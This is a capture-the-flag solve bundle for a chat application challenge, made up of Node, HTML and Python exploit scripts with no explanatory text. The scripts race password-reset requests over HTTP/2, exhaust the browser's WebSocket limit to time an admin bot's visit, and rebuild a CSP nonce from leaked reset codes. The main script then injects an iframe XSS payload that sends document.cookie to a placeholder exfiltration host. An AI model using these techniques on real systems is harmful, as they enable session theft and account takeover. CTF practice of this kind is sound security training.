plaid24 werechat sol

h2spam.js

// http2 muxer to race reset passcode
const http2 = require('http2');

process.env["NODE_TLS_REJECT_UNAUTHORIZED"] = 0;
const clientSession = http2.connect(process.argv[2]);

for (let i = 0; i < 5; i++) {
    const r = clientSession.request({
        ":method": "POST",
        ":path": "/api/request-reset",
        "content-type": "application/json"
    });
    r.write(JSON.stringify({ username: process.argv[3] }), 'utf-8');

    r.on('response', (headers, flags) => {
        r.on('data', (chunk) => {
            console.log(`Body for request`, i, `${chunk}`);
        });
    });
    
    r.end();
}

clientSession.on('error', (err) => {
  console.error('HTTP/2 Client Session Error:', err);
});

setTimeout(() => process.exit(), 5000);

lol.html

<!DOCTYPE html>
<html>
<body>
    <script>
        const TARGET = (new URLSearchParams(location.search)).get("target") || "http://localhost:3000";
        const sleep = ms => new Promise(r => setTimeout(r, ms));

        // waits for lol2.html to fill 256 websockets, then redirects to TARGET/chat
        window.onload = async () => {
            window.open("lol2.html");
            await sleep(47_000);
            navigator.sendBeacon("/opening_chat");
            location.href = `${TARGET}/chat`;
        }
    </script>
</body>

lol2.html

<!DOCTYPE html>
<html>
<body>
    <script>
        const sleep = ms => new Promise(r => setTimeout(r, ms));

        const SOCKET_LIMIT = 256;
        const WS_SLEEP_SERVER = i => `ws://${i}.WS_SLEEP`;

        const iframeWs = () => {
            let i = document.createElement('iframe')
            i.src=`http://other-site-that-makes-one-ws-connection`
            document.body.append(i)
            return i
        }

        window.onload = async () => {
            // fill up 256 websockets
            // + a couple more for good measure
            iframeWs();
            for (let i = 0; i < SOCKET_LIMIT + 10; i++) {
                x = new WebSocket(WS_SLEEP_SERVER(i));
            }
            await sleep(47_000);
            // other tab now navigates to /chat
            // 31 seconds to get email codess
            await sleep(31_000);
            navigator.sendBeacon("/unblocking");
            location = "about:blank";
        }
    </script>
</body>

plaid24-werechat-sol.py

# main solve script

import requests
import time
import aiohttp
import asyncio
from websockets.sync.client import connect
import json
import os
import sys

TARGET = sys.argv[1]
TARGET_ADMINBOT = sys.argv[2]

if TARGET.endswith("/"):
    TARGET = TARGET[:-1]
if TARGET_ADMINBOT.endswith("/"):
    TARGET_ADMINBOT = TARGET_ADMINBOT[:-1]

TARGET_WS = TARGET.replace("https", "wss").replace('http', 'ws')

TARGET_INTERNAL = TARGET

EMAIL = '5fa0de06-3817-4649-9305-9bd7cd99d2aa@email.webhook.site'

USERNAME = 'strell'

EXPLOIT_URL = 'http://EXPLOIT_URL/lol.html'

EXFIL = 'http://EXFIL_URL/flag?flag='

N = 15

try:
    os.unlink("room_id.txt")
except:
    pass

async def bruh(
    session: aiohttp.ClientSession,
    **kwargs
) -> dict:
    r = await session.request('POST', url=f'{TARGET}/api/request-reset', json={ "username": USERNAME }, **kwargs)
    print(await r.text())

async def main():
    s = requests.Session()

    print(s.post(f'{TARGET}/api/register', json={
        'inviteCode': 'every_wolf_needs_a_pack',
        'username': USERNAME,
        'email': EMAIL,
        'password': USERNAME
    }).text)

    r = s.post(f'{TARGET}/api/login', json={
        'username': USERNAME,
        'password': USERNAME
    })
    print(r.text)
    session_token = r.cookies.get('session')

    print('session token', session_token)

    s.post(f'{TARGET_ADMINBOT}/visit', json={
        'url': f'{EXPLOIT_URL}?target={TARGET_INTERNAL}'
    })

    time.sleep(60)

    print("resetting...")
    if TARGET.startswith("https:"): # http2
        os.system(f'node h2spam.js "{TARGET}" "{USERNAME}"')
    else:
        async with aiohttp.ClientSession() as session:
            tasks = []
            for _ in range(N):
                tasks.append(bruh(session=session))
            await asyncio.gather(*tasks)

    def get_input(prompt):
        data = input(prompt).strip()
        if len(data) != 0:
            return data
        return get_input(prompt)

    code_1 = get_input('code 1 (K)> ')[:12]
    code_2 = get_input('code 2 (L)> ')[:12]
    code_3 = get_input('code 3 (M)> ')[:12]

    nonce = code_1 + code_2[:4] + 'AAAI'
    ws_session = code_2[4:] + code_3[:8] + 'AAAJ'

    #nonce = get_input("nonce: ")
    #ws_session = get_input("ws_session: ")

    os.system(f'python3 ws.py "{TARGET_WS}" "{ws_session}" "{session_token}"')

    room_id = open('room_id.txt', 'r').read()

    print('room id', room_id)

    new_ws_session = s.post(f'{TARGET}/api/session').json()['id']

    print('new websocket session id', new_ws_session)

    time.sleep(1)
    with connect(f'{TARGET_WS}/api/ws?session={new_ws_session}', additional_headers=[('Cookie', f'session={session_token}')]) as ws:
        while True:
            time.sleep(1)
            ws.send(json.dumps({
                'kind': 'Message',
                'room': room_id,
                'content': f'<iframe srcdoc="<script nonce=\'{nonce}\'>window.open(`{EXFIL}`+document.cookie)</script>"></iframe>'
            }))
            print(ws.recv())

asyncio.run(main())

ws.py

# sends websocket createroom message then immediately disconnects

import ssl

ssl._create_default_https_context = ssl._create_unverified_context

from websockets.sync.client import connect
import json
import time
import sys

print(sys.argv)

TARGET = sys.argv[1]
if TARGET.endswith("/"):
	TARGET = TARGET[:-1]

print(TARGET + "/api/ws?session=" + sys.argv[2])

websocket = connect(TARGET + "/api/ws?session=" + sys.argv[2], additional_headers=[('Cookie', 'session=' + sys.argv[3])])
print('connected!')
time.sleep(1)
websocket.send(json.dumps({"kind":"CreateRoom","name": "x"}))
print('data sent!')
data = json.loads(websocket.recv())
print('recv', data)
open("room_id.txt", "w").write(data["data"]["id"])
websocket.socket.close()
exit()